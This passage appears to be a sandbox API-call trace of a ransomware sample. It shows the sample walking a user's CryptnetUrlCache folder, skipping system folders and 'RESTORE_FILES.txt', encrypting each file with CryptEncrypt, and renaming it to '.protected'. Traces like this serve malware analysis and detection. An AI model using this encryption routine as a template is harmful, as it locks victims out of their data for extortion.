HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.021] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6") returned 152 [0089.021] StrStrW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpSrch=".txt") returned 0x0 [0089.021] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6") returned 152 [0089.021] StrStrW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpSrch=".rar") returned 0x0 [0089.021] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6") returned 152 [0089.021] StrStrW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpSrch=".zip") returned 0x0 [0089.021] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x194, lpOverlapped=0x0) returned 1 [0089.022] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe6c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.022] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x194, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x194, lpOverlapped=0x0) returned 1 [0089.022] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.022] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.022] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.022] CloseHandle (hObject=0x150) returned 1 [0089.023] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6.protected") returned 162 [0089.023] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6.protected")) returned 1 [0089.023] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.023] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpString2="Windows") returned -1 [0089.023] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpString2="Program Files") returned -1 [0089.023] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpString2="Program Files (x86)") returned -1 [0089.023] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpString2="$Recycle.bin") returned 1 [0089.023] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpString2="System Volume Information") returned -1 [0089.023] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD") returned 152 [0089.023] StrStrIW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpSrch=".protected") returned 0x0 [0089.023] lstrcmpW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpString2="RESTORE_FILES.txt") returned -1 [0089.023] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.023] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.024] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.024] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD") returned 152 [0089.024] StrStrW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpSrch=".txt") returned 0x0 [0089.024] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD") returned 152 [0089.024] StrStrW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpSrch=".rar") returned 0x0 [0089.024] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD") returned 152 [0089.024] StrStrW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpSrch=".zip") returned 0x0 [0089.024] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x198, lpOverlapped=0x0) returned 1 [0089.025] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe68, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.025] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x198, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x198, lpOverlapped=0x0) returned 1 [0089.025] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.025] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.025] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.025] CloseHandle (hObject=0x150) returned 1 [0089.026] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD.protected") returned 162 [0089.026] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd.protected")) returned 1 [0089.026] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.026] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpString2="Windows") returned -1 [0089.026] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpString2="Program Files") returned -1 [0089.026] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpString2="Program Files (x86)") returned -1 [0089.026] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpString2="$Recycle.bin") returned 1 [0089.026] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpString2="System Volume Information") returned -1 [0089.026] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0") returned 152 [0089.026] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpSrch=".protected") returned 0x0 [0089.027] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpString2="RESTORE_FILES.txt") returned -1 [0089.027] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.027] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.027] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.028] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0") returned 152 [0089.028] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpSrch=".txt") returned 0x0 [0089.028] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0") returned 152 [0089.028] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpSrch=".rar") returned 0x0 [0089.028] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0") returned 152 [0089.028] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpSrch=".zip") returned 0x0 [0089.028] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x182, lpOverlapped=0x0) returned 1 [0089.029] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.029] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x182, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x182, lpOverlapped=0x0) returned 1 [0089.029] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.029] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.029] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.029] CloseHandle (hObject=0x150) returned 1 [0089.029] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0.protected") returned 162 [0089.029] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0.protected")) returned 1 [0089.030] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.030] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpString2="Windows") returned -1 [0089.030] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpString2="Program Files") returned -1 [0089.030] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpString2="Program Files (x86)") returned -1 [0089.030] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpString2="$Recycle.bin") returned 1 [0089.030] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpString2="System Volume Information") returned -1 [0089.030] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E") returned 152 [0089.030] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpSrch=".protected") returned 0x0 [0089.030] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpString2="RESTORE_FILES.txt") returned -1 [0089.030] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.030] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.030] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.031] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E") returned 152 [0089.031] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpSrch=".txt") returned 0x0 [0089.031] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E") returned 152 [0089.031] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpSrch=".rar") returned 0x0 [0089.031] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E") returned 152 [0089.031] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpSrch=".zip") returned 0x0 [0089.031] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x186, lpOverlapped=0x0) returned 1 [0089.032] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.032] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x186, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x186, lpOverlapped=0x0) returned 1 [0089.032] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.032] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.032] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.032] CloseHandle (hObject=0x150) returned 1 [0089.033] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E.protected") returned 162 [0089.033] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e.protected")) returned 1 [0089.033] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.033] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpString2="Windows") returned -1 [0089.033] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpString2="Program Files") returned -1 [0089.033] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpString2="Program Files (x86)") returned -1 [0089.033] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpString2="$Recycle.bin") returned 1 [0089.033] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpString2="System Volume Information") returned -1 [0089.033] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1") returned 152 [0089.034] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpSrch=".protected") returned 0x0 [0089.034] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpString2="RESTORE_FILES.txt") returned -1 [0089.034] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.034] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.034] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.034] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1") returned 152 [0089.034] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpSrch=".txt") returned 0x0 [0089.034] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1") returned 152 [0089.034] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpSrch=".rar") returned 0x0 [0089.034] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 